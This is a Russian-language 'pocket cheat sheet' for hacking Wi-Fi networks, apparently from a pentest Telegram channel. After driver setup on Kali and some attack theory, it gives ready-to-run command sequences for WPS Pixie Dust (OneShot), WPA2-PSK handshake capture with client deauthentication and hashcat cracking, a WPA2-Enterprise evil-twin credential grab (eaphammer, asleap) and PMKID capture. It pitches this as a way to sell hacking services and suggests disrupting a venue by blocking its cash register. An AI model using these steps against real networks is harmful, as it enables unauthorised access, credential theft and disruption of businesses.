Шатаем WI-FI (карманная шпора)
После прочтения статьи вы сможете полноценно предоставлять услуги по взлому wi-fi.
Оглавление:
Install Drivers (УСТАНОВКА ДРОВ НА КАЛИ)
Установка и настройка Alfa AWUS036ACH на Kali Linux
Если загуглить «Лучший адаптер Wi-Fi для Kali Linux», то во всех статьях в пятерку лучших будет входить адаптер Alfa AWUS036ACH. Он поддерживает режим монитора и умеет инжектировать пакеты. Проблема лишь в том, что при подключении, Kali Linux не видит WiFi-адаптер. Далее покажу как решить эту проблему, установив и настроив драйвер Realtek для адаптера Alfa AWUS036ACH на Kali Linux.
Еще по теме: Лучшие способы взлома WiFi
Установка и настройка Alfa AWUS036ACH на Kali Linux
Подключите адаптер к компьютеру с Kali Linux через доступный USB-порт с помощью прилагаемого кабеля.
Если ввести команду lusb, вы увидите, что Kali видит физическое USB-устройство на шине 002.
Kali Linux не видит Alfa AWUS036ACH
Но вот выполнение команды iwconfig, показывает, что Kali не распознает его, как доступное сетевое устройство. Kali не видит его как устройство, которое может использовать, потому что драйверы еще не установлены.
Следующие несколько шагов исправят этот непорядок.
Обновление Kali Linux
Как всегда, перед установкой драйверов нужно убедиться, что используется обновленная версия Kali Linux.
После завершения обновления перезагрузите систему.
Установка драйвера Realtek-rtl88xxau на Kali Linux
$ sudo apt-get install realtek-rtl88xxau-dkms
Поддержка модулей динамического ядра (DKMS) упрощает процесс установки обновлений драйверов.
Установив dkms, можно приступить к клонированию драйвера rtl8812au с GitHub:
$ git clone <https://github.com/aircrack-ng/rtl8812au
>
После скачивания драйвера rtl8812 с GitHub, перейдите в созданный каталог:
В этом каталоге выполните следующую команду, для компиляции всех файлов rtl8812 в двоичное приложение:
Команда make install
берет только что созданные двоичные файлы и копирует их в соответствующее место в файловой системе. Убедитесь, что запускаете ее с правами доступа root:
После перезагрузки системы вы можете подтвердить установку драйверов rtl8812au с помощью команды iwconfig
. Теперь есть два беспроводных интерфейса, wlan0 и wlan1 — интерфейс Realtek, который мы установили.
Теперь в списке доступных интерфейсов, вы увидите Wi-Fi Networks (REALTEK RTL8812AU 802.11A/B/G/N/AC 2T2R).
Режим монитора Alfa AWUS036ACH на Kali Linux
Чтобы заставить адаптер Alfa AWUS036ACH работать в режиме монитора, откройте терминал Kali Linux и выполните команды:
$ sudo iw dev wlan1 set type monitor
Это надо будет делать каждый раз, когда захотите использовать адаптер Alfa AWUS036ACH в режиме монитора. Если возникнут проблемы с переводом адаптера в режим монитора, тогда вам сюда «Как перевести адаптер в режим монитора».
На этом все. Надеюсь статья была полезна.
WIFI ATTACKS - ТЕОРИЯ:
Использование SSID и паролей по умолчанию
Точки доступа WIFi поставляются с SSID и паролем по умолчанию, которые необходимо изменить, но слишком часто эти пароли по умолчанию остаются на месте.
Это позволяет злоумышленнику легко войти в систему и получить контроль над маршрутизатором, изменить настройки или прошивку, загрузить вредоносные сценарии или даже изменить DNS-сервер так, чтобы весь трафик направлялся на IP-адрес, принадлежащий злоумышленнику.
- Пароли по умолчанию должны быть изменены, чтобы никто в радиусе действия сигнала не смог подключиться и прослушивать трафик.
- Если беспроводные контроллеры используются для управления точками доступа WiFi через веб-интерфейсы, убедитесь, что пароли по умолчанию также изменены. Эти пароли по умолчанию можно легко найти в Интернете и использовать для атак на беспроводные сети.
Размещение точки доступа в местах возможного несанкционированного доступа
Если точка доступа размещена в месте, где к ней можно получить физический доступ, это может привести к несанкционированному вмешательству. Чтобы вернуть точку доступа к заводским настройкам по умолчанию, требуется всего несколько секунд.
Включенная служба WPS
Если на точке доступа включен Wi-Fi Protected Setup, то с большой вероятностью она вскрывается перебором известных пинов или более изящной атакой PixieDust.Список пинов для перебора берется из дефолтных конфигов производителя, который определяется по MAC-адресу. Делать исчерпывающий перебор всех вариантов (брутфорс) чаще всего бессмысленно, так как после N неудачных попыток авторизации по WPS роутер надолго блокирует дальнейшие.
Использование уязвимого протокола WEP
Протокол Wired Equivalent Privacy
(WEP
) был первым протоколом, используемым для шифрования беспроводного трафика. WEP
, как следует из названия, был призван сделать беспроводные сети такими же безопасными, как и их проводные аналоги, но это не делает беспроводные сети WEP
безопасными.
WEP
основан на шифре RC4
, который сам по себе является безопасным. Но проблема заключается в том, каким образом RC4
реализован в WEP
.
WEP
позволяет повторно использовать вектор инициализации, а повторное использование ключей никогда не является хорошей идеей. Это позволяет злоумышленнику легко взломать шифрование.
В WEP
было обнаружено еще несколько уязвимостей, что делает его далеко не безопасным.
Несмотря на то, что WEP
обесценился и существует множество более безопасных протоколов шифрования беспроводных сетей, некоторые компании продолжают использовать WEP
, ошибочно полагая, что он безопасен.
WEP
более безопасен, чем отсутствие шифрования вообще - плохая безопасность лучше, чем отсутствие безопасности - но существует множество более надежных вариантов шифрования трафика WiFi.
- Если вы хотите повысить безопасность и предотвратить атаки на WLAN, перейдите на
WPA2
илиWPA3
, которые используют гораздо более безопасный стандарт расширенного шифрования (AES
) и лишены уязвимостейWEP
.
Уязвимость WPA2
https://xakep.ru/2019/12/11/krack/
WPA
может быть более безопасным, чем WEP
, но и он не лишен уязвимостей в беспроводной сети. Два бельгийских исследователя - Мати Ванхоеф и Франк Писсенс из Университета Левена - обнаружили серьезный недостаток в протоколе безопасности WPA
. Этот недостаток получил название KRACK
, сокращенно от Key Reinstallation Attack
. Этот недостаток может быть использован в атаке “человек посередине
” для кражи конфиденциальных данных, передаваемых через зашифрованное WPA
соединение WiFi. При использовании уязвимости WPA
злоумышленник может подслушать трафик и получить банковские реквизиты, пароли и информацию о кредитных картах.
Уязвимость существует в четырехстороннем рукопожатии. Шифрованное соединение WPA2
начинается с четырехстороннего рукопожатия, но не все части этого рукопожатия являются обязательными. Чтобы ускорить повторное подключение, третья часть передается повторно. Эта третья часть рукопожатия может повторяться несколько раз, и именно этот шаг может быть использован при атаке на беспроводную сеть.
Многократно сбрасывая пароль, передаваемый на третьем этапе рукопожатия
, злоумышленник может постепенно сопоставить зашифрованные пакеты и обнаружить полную связку ключей, используемую для шифрования трафика.
Угрожающий агент может создать клон точки доступа WiFi, к которой пользователь подключался ранее, - злого двойника
. Для пользователя в этом не будет ничего страшного, так как доступ в Интернет будет предоставляться через этого “злого двойника
”. Злоумышленник может заставить пользователя подключиться к клонированной сети WiFi и перехватить всю информацию, отправленную через эту сеть WiFi. Хотя атака не будет работать на сайтах с SSL/TLS
шифрованием, можно использовать инструменты, которые делают это возможным, заставляя пользователя посетить HTTP версию сайта.
Чтобы осуществить атаку KRACK
WiFi, сеть WiFi должна использовать WPA2-PSK
или WPA-Enterprise
, а атакующий должен находиться в зоне действия сигнала WiFi.
- Лучшим средством защиты является обновление маршрутизаторов.
- Проблема была решена в
WPA3
, который поддерживается новыми беспроводными точками доступа.
Даже с учетом этой исключительно распространенной уязвимости беспроводных сетей, WPA2
по-прежнему гораздо более безопасен, чем WEP
.
NetSpectre - удаленная уязвимость Spectre
https://xakep.ru/2018/07/30/netspectre/
Spectre - это уязвимость, которая затрагивает микропроцессоры, выполняющие предсказание ветвлений. Уязвимость может быть использована, чтобы позволить злоумышленнику получить доступ к выбранным местам виртуальной памяти и, таким образом, получить конфиденциальные данные. Для того чтобы воспользоваться уязвимостью, злоумышленнику необходимо убедить пользователя загрузить и запустить вредоносный код или посетить веб-сайт, на котором в браузере запущен JavaScript. Исследователи из Технологического университета Граца разработали новый тип атаки, которая может быть осуществлена через сетевые соединения, включая сети WiFi. Атака - названная NetSpectre - к счастью, сложна, поэтому существуют гораздо более простые способы атаковать организацию. Поэтому риск ее использования невелик.
Атаки на дефолтные пароли и мисконфиги роутеров
С каждым годом растет количество и добавляются виды устройств в сети
становиться видно больше устройств, которые не настраивались вообще:
Множество устройств с учётными данными admin: admin видны для сканеров
По итогу можно выполнить достаточно большой импакт.
Например, представим себе что вы взломали wi-fi точку отеля, кальянной и т.п.
Теперь вы видите и можете просканировать подсети. Как только это произойдет, вы наткнетесь на ПК администратора/кассира, кассовый аппарат, камеры периметра и т.п.
Это очень круто, но можно просто изменить настройки роутера и добавить кассовый аппарат в список запрещенных устройств, тем самым выбить из работы заведение до приезда мастера. Даже банальная смена пароля вызовет ошибки в работе у подключенных устройств.
Атаки на уязвимости специфических сервисов и функции роутеров
Роутеры, кроме своих обычных функций, могут быть файловыми серверами, веб-серверами, торрент-клиентами и т. д.
Wardriving
Wardriving - это техника, используемая для выявления и нанесения на карту уязвимых точек доступа. Название происходит от того, что злоумышленники ездят по району и используют ноутбук с GPS-устройством, антенну для определения и записи местоположения беспроводных сетей. Эта техника эффективна, поскольку многие сети WiFi, используемые предприятиями, выходят за пределы здания, а для защиты этих сетей применяются слабые средства контроля безопасности.
Warshipping
Варшипинг - это более эффективный метод атаки на сети WiFi, поскольку он позволяет проводить атаки удаленно, даже если атакующий не находится в радиусе действия сети WiFi. Эту тактику объяснили исследователи IBM X-Force Red на Black Hat USA. Они использовали дешевые (менее 100 долларов) и легкодоступные компоненты для создания одноплатного компьютера с возможностями WiFi и 3G, который работает от батареи сотового телефона. Устройство может использоваться для локального подключения к сети WiFi и отправки информации злоумышленникам через сотовую связь 3G.
Поскольку устройство небольшое, его можно легко спрятать в небольшом пакете, а доставить этот пакет в здание очень просто. Его можно просто отправить по почте. Поскольку посылка может быть адресована кому-то, кто не работает в компании, она может пролежать в почтовом отделении некоторое время, прежде чем ее вскроют. Поскольку посылку можно отследить, злоумышленники будут знать, когда она окажется в здании. Кроме того, устройство может быть спрятано в любом количестве предметов - от цветочных горшков до плюшевых медведей. Если устройство находится в зоне действия сетей WiFi, его можно использовать для атаки на эти сети.
Хешированные коды доступа к сети могут быть отправлены обратно злоумышленникам для взлома, после чего устройство может подключиться к сетям WiFi в здании и собирать данные. Устройство может быть использовано в атаке “человек посередине”, выдавая себя за внутреннюю сеть WiFi.
WIFI ATTACKS - ПРАКТИКА:
АТАКА Pixie Dust
(+) Взлом требует несколько секунд.
(-) Все стали выключать WPS, мало точек.
В конце 2014 года специалист по компьютерной безопасности Доминик Бонгард (Dominique Bongard) нашел уязвимость в WPS, которая позволила взломать Wi-Fi роутер за несколько минут.
Проблема была в генерации случайных чисел (E-S1 и E-S2) на многих роутерах. Если мы узнаем эти числа — мы сможем легко узнать WPS pin, так как именно они используются в криптографической функции для защиты от брутфорса по получению WPS pin.
Роутер отдает хэш, сгенерированный с использованием WPS pin и данных (E-S1 и E-S2) чисел, что бы доказать, что он его так же знает (это сделано для защиты от подключения к фейковой точке, которая могла бы просто принять ваш пароль и слушать трафик).
E-S1 и E-S2 используются в генерации E-Hash1, E-Hash2, которые в свою очередь получим от роутера в сообщении M3.
Протокол WPS
Важными здесь являются: M1
, M2
, M
3.
Сообщение M1
— роутер отправляет клиенту N1
, Description
, PKE
.
Сообщение M2
— клиент отправляет роутеру N1
, N2
, PKR
, Auth
.
Auth
— хэш от первого и второго сообщений.
Cообщение M3
— роутер отправляет клиенту E-Hash1
, E-Hash2
.
E-Hash1
= HMAC-SHA-256(authkey) (E-S1
| PSK1
| PKE
| PKR
)
E-Hash2
= HMAC-SHA-256(authkey) (E-S2
| PSK2
| PKE
| PKR
)
Где PSK1
— первые 4 цифры WPS pin
, PSK2
— остальные 4 цифры.
E-S1
и E-S2
— должны быть случайными 128-битными числами.
Из этого получается что неизвестными являются (пока еще) E-S1 и E-S2
, PSK1
и PSK2
.
M4 — клиент отправляет R-Hash1
, R-Hash
2 для подтверждения того, что он так же знает WPS pin
.
Если все ок — роутер отдаст клиенту парольную фразу для доступа к сети, привязанную к текущему WPS pin. Это сделано из расчета, что WPS pin не должен быть постоянным, и в случае его изменения — клиент должен заново получить пароль.
Генерация E-S1 и E-S2 на наших роутерах:
В “Broadcom/eCos” эти 2 числа генерируются сразу после генерации N1 (публичный ключ) той же функцией. Получение E-S1 и E-S2 сводится к брутфорсу состояния функции на основании N1 и получения в результате E-S1 и E-S2.
#if (defined(__ECOS) || defined(TARGETOS_nucleus)) void generic_random(uint8 * random, int len) { int tlen = len; while (tlen--) { *random = (uint8)rand(); *random++; } return; } #endif
Исходник — github.com/RMerl/asuswrt-merlin/blob/master/release/src-rt/bcmcrypto/random.c
В “Realtek” для генерации таких чисел функция использует UNIX timestamp.
Аналогично Broadcom, N1 и E-S1,2 генерирует одна функция.
И если весь обмен происходит в ту же секунду, E-S1 = E-S2 = N1.
Если в течение нескольких секунд — брутфорс состояния на основе N1.
Исходник — github.com/skristiansson/uClibc-or1k/blob/master/libc/stdlib/random_r.c
В “Ralink” E-S1 и E-S2 никогда не генерятся. Они всегда равны 0.
В “MediaTek” и “Celeno” такая же картина:
Summary
Предположим мы уже знаем PKE, PKR, Authkey, E-Hash1 и E-Hash2 — все эти данные мы получили в результате общения с роутером (см. Выше M1, M2, M3). E-S1 и E-S2 сбрутили либо знаем что он = 0.
Дело осталось за малым — отправляем все данные в хэш функцию и сравниваем каждый новый pin с (E-Hash1 и E-Hash2). В результате за несколько минут мы получим WPS pin и, собственно, доступ к сети.
Воспроизведение
Если на маршрутизаторе только одна кнопка (она может называться «WLAN/WPS», «WiFi/WPS») — для включения или отключения раздачи Wi-Fi нужно держать ее нажатой не менее трех секунд. Нажимая кнопку коротким быстрым нажатием, вы активируете функцию WPS.
Шаг 1. Запускаем Kali Linux и обновляем список пакетов введя в терминале apt update.
Шаг 2. Копируем с гитхаба скрипт OneShot. Для демонстрации я выбрал именно его по двум причинам. Во-первых, потому что человек специализирующийся на аудите посоветовал именно OneShot, а во-вторых, только она поддерживает атаку без перевода сетевой карты в режим монитора. Да и к тому же в данный срипт уже встроен сканер, показывающий только активные сети с включённым WPS’ом, а значит, теоретически уязвимым.
git clone https://github.com/drygdryg/OneShot
Шаг 3. Заходим в каталог с прогой.
Шаг 4. И запускаем сканирование. Практически сразу появится список из сетей, обнаруженных в зоне видимости. Точки, которые 100% небезопасны, данная прога помечает зелёным. Остальные же – надо тестить. Вводим номер.
sudo python OneShot/oneshot.py -i wlan0 --iface-down -K
Зеленым цветом утилита подсветит уязвимые точки и предложит ввести номер атакуемой:
Шаг 5. Вводим номер атакуемой точки и ждём окончания процедуры проверки.
На самом деле, далеко не все устройства сегодня имеют подобную уязвимость. Если быть точнее, их процентов 5. Ну край 10. И то, только потому что в большинстве своём админы на предприятиях РФ не особо заморачиваются с безопасностью. Крайне редко обновляет прошивки, а уж о покупке новых маршрутизаторов задумываются только когда сгорает старый.
АТАКА WPA2-PSK
В WPA2-PSK аутентификация осуществляется по паролю (Pre-Shared Key). Клиент при подключении указывает пароль, передает точке, та аутентифицирует пользователя.
Для следующих атак необходимо перевести сетевую карту в режим монитора Узнаем имя интерфейса: sudo iw dev
или iwconfig
Останавливаем мешающие службы: sudo systemctl stop NetworkManager
sudo systemctl stop networking
sudo airmon-ng check kill
Переводим в режим монитора: sudo airmon-ng start wlan0
Проверяем успешностьsudo iw dev
Handshake capture
Смысл атаки в том, что клиент при подключении к сети, в ходе 4-х стороннего рукопожатия, передает хэш пароля от данной сети. Задача - перехватить данное рукопожатие. Для этого можно просто сидеть и сниффать весь трафик, а можно принудительно отключить уже подключенных клиентов. Так или иначе, нам требуются клиенты целевой сети, т.к. атака направлена в первую очередь на них.
Похек скрытой сети происходит ровно так же: при подключении клиент передает имя сети, к которой подключается. airodump это прекрасно восстанавливает на лету.
Поиск сетей
Для начала надо определиться, какие сети мы видим и че будем хекать. Сначала стоит поискать по всем каналам
Поиск цели
sudo airodump-ng –bssid [MAC адрес точки доступа] –channel [номер канала] -w wifi wlan0
Деаутентификация клиентов
Лучше делать во втором окне (в первом у нас пашет airodump С флагом на запись!)
Количество пакетов: 0 - для бесконечного; Без указания клиента, будут бродкаст пакеты (как показала практика, не очень это эффективно)
sudo aireplay-ng –deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0
В случае перехвата хэндшейка, в airodump'e сверху в строке состояния появится надпить WPA handshake: MAC. Примерно так:
CH 1 ][ Elapsed: 48 s ][ 2022-11-11 13:37 ][ WPA handshake: 01:02:03:04:05:06
Чистим полученный хендшейк
wpaclean ИмяНовогоФайла ИмяСтарогоФайла
sudo aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]
Дамп хэндшейков из .cap файла
После того, как перехватили хэндшейк, его надо вытащить из .cap файла. Делается командой
aircrack-ng [CAP_FILE] -j [OUT_FILE]
Флаг -j перегоняет в формат, поддерживаемый хэшкатом
Брут
Собираем все сдампленные хэндшейки в один файл:
cat *.hccapx > merge.hccapx
Отправляем на сервер и ставим брутить:
hashcat -m 22000 -a 0 [HCCAPX_FILE] [WORDLIST] -o [OUT_FILE] -r [RULE_FILE] --session [SESSION_NAME]
Восстанавливаем работу сети
АТАКА WPA2-MGT
Пока тыкали airodump, могли заметить подобные сетки:
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfWifi
И имя этой штуке - энтерпрайз. Отличие от PSK-сетки - клиента аутентифицирует не роутер, а RADIUS-сервер. Есть различные варианты реализации такой сети. Основные отличия - в типах EAP. Основной способ атаки - поднятие поддельной точки доступа (Evil-Twin). Создаем точку с таким же SSID, как у легитимной сети, и если клиент не проверяет, куда он подключается, мы получим его креды.
Подсказка: ловить клиентов стоит в местах, где сигнал от легитимной точки минимален или отсутствует. Так выше шанс, что клиенты будут приходить аутентифицироваться на нашей точке.
Проверяем на каком интерфейсе у нас работает альфа:
Видно что wlan1 - это интерфейс, который подлючен к точке доступа для выхода в интернет (это видно по тому, что был определен ip адрес)
Поднимаем поддельную точку. Указываем интерфейс, канал, имя сети, путь до созданного серта:
sudo python eaphammer --bssid F8:0B:CB:D7:5B:EF --essid infosec --channel 1 --wpa-version 2 --auth wpa-eap --interface wlan0 --creds --hw-mode a --server-cert /home/administrator/tools/eaphammer/certs/ca/[email protected]
Важной деталью является тот момент, что я изменил канал на 1 в отличии от легитимной точки, и указал мод для 5 ГГц.
--hw-mode (n/a) - n для 2,4 ГГц, a для 5 ГГц --negotiate - EAP downgrade
Потом нужно расбрутать данные:
Но перед этим необходимо установить старую версию ПО и поставить необходимые библиотеки:
- https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libxcrypt-dev_2.4-4_amd64.deb.html
- https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libxcrypt1_2.4-4_amd64.deb.html
sudo dpkg -i '/home/administrator/Downloads/libxcrypt-dev_2.4-4_amd64.deb'
sudo dpkg -i '/home/administrator/Downloads/libxcrypt-dev_2.4-4_amd64.deb'
$ git clone <https://github.com/joswr1ght/asleap
> $ cd asleap
$ make
$ ./asleap -V
asleap –C <challenge> -R <response> -W <wordlist
asleap –C 9b:ef:81:76:5f:cb:c7:a6 -R
./asleap -C c1:5d:c7:2a:17:f9:61:c6 -R fa:bc:26:d9:93:b8:f2:15:7a:dd:c8:49:dc:bd:56:67:70:71:c5:a1:06:42:60:d6 -W /usr/share/wordlists/rockyou.txt
hashcat e_zaytsev::::590bd7b3c2b1e0349a7fee61b92cd34bb6302fd9cb703f34:b282798407b51e04 /usr/share/wordlists/rockyou.txt
Атака не будет работать, если:
- Аутентификация происходит по серту (EAP-TLS, PEAPv0(EAP-TLS)), т.к. нечего перехватывать
- Осуществляется валидация сертификата сервера во время первой фазы аутентификации
Увидели такие ошибки в логах? Можно идти курить. Атака не сработает.
АТАКА PMKID
Эта атака была открыта случайно во время поиска новых способов атаковать будущий стандарт безопасности WPA3. Этот WPA3 будет атаковать намного труднее из-за современного протокола установления ключей, называемого "Simultaneous Authentication of Equals" (SAE).
В чем же плюсы такой атаки ? А в том что больше не нужно ждать "соседей" пока они придут домой и подключаться к своему WIFI, что бы отключить их и поймать Рукопожатие - Handshake.
В процессе дампа информации от AP, мы сможем найти хеш даже в WireShark :
Переведем нашу карту в режим монитора
airmon-ng start *wlan1*
Имя вашего адаптера вы можете узнать прописав команду
airmon-ng
после того как перевели в режим монитора, воспользуемся утилитой
hcxdumptool
hcxdumptool -o all-wifi.pcapng -i wlan1mon --enable_status 15
И расскажу не много хитрости которую не рассказал в видео ролике, пускай это будет некоторой эксклюзивностью если можно так сказать
Мы можем направить атаку не на все точки доступа сразу, а точечно, выбрать мак адрес и записывать в файл информацию только о нем, для этого
airodump-ng -i wlan1mon
Найдем нужный нам SSID, скопируйте его MAC адрес и выполните следующую команду
echo "XXXXXXXXXXXX" > filterlist.txt
Но самое интересное то что утилита
hxcdumptool
принимает МАК адресс без разделителя
data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
И теперь если мы хотим атаковать определенную AP пишем
hcxdumptool -o all-wifi.pcapng -i wlan1mon --enable_status 15 --filterlist_ap=filterlist.txt --filtermode=2
sudo hcxdumptool -o all-wifi.pcapng -i wlan0 --enable_status 15 -t 5
Теперь нам понадобиться утилита
hcxpcaptool
hcxpcaptool -z all-wifi.16800 all-wifi.pcapng
Хочу отметить что тут нужно сначала указывать имя выходного файла "all-wifi.16800", где 16800 напоминалка о режиме hashcat, но об этом не много позже, а all-wifi.pcapng это наш сборник информации из которого мы извлекаем PMKID для брут форса.
После того как мы в логах увидели уведомление напротив пакета
PMK FOUND
Останавливаем процесс и двигаемся дальше.
Теперь за дело берется наш кот, кормим его не вискасом,а нашим хешем =)
hashcat -a 0 all-wifi.16800 /usr/share/wordlists/rockyou.txt
И запускаем и ждем результатов
Тут уже будет зависеть от ваших словарей, либо фантазии по маске в hashcat.
https://www.youtube.com/watch?v=DABSuU5NUwM&t=10s
Еще больше интересных статей в моем ТГ канале: https://t.me/pro_pentest